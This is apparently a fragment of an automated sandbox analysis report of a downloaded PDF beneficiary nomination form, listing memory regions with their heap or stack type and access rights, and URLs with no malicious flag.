page readonly
|
||
2284CC42000
|
heap
|
page read and write
|
||
14286913000
|
heap
|
page read and write
|
||
128FF7E000
|
stack
|
page read and write
|
||
1428C0F7000
|
heap
|
page read and write
|
||
26418C68000
|
heap
|
page read and write
|
||
1998F43A000
|
heap
|
page read and write
|
||
2641855F000
|
heap
|
page read and write
|
||
D3D487E000
|
stack
|
page read and write
|
||
2284442B000
|
heap
|
page read and write
|
||
767000
|
heap
|
page read and write
|
||
A973000
|
heap
|
page read and write
|
||
1428D000000
|
heap
|
page read and write
|
||
11E71B40000
|
heap
|
page read and write
|
||
11E71BCE000
|
heap
|
page read and write
|
||
24692980000
|
heap
|
page read and write
|
||
1998ED19000
|
heap
|
page read and write
|
||
123D6742000
|
heap
|
page read and write
|
||
79AB37F000
|
stack
|
page read and write
|
||
27A556C0000
|
heap
|
page read and write
|
||
26418519000
|
heap
|
page read and write
|
||
2740CC97000
|
heap
|
page read and write
|
||
2284CC47000
|
heap
|
page read and write
|
||
7FFB226D2000
|
unkown
|
page readonly
|
||
7FFB27C85000
|
unkown
|
page readonly
|
There are 780 hidden memdumps, click here to show them.
DOM / HTML

| URL | Malicious |
|---|---|
| https://www.oldmutual.co.za/v3/assets/blt0554f48052bb4620/blt8b52803ba23b252a/66742ed3b2cbc14f42b4434c/Superfund_Beneficiary_Nomination_form.pdf | |
| file:///C:/Users/user/Downloads/downloaded.pdf | |
| file:///C:/Users/user/Downloads/downloaded.pdf | |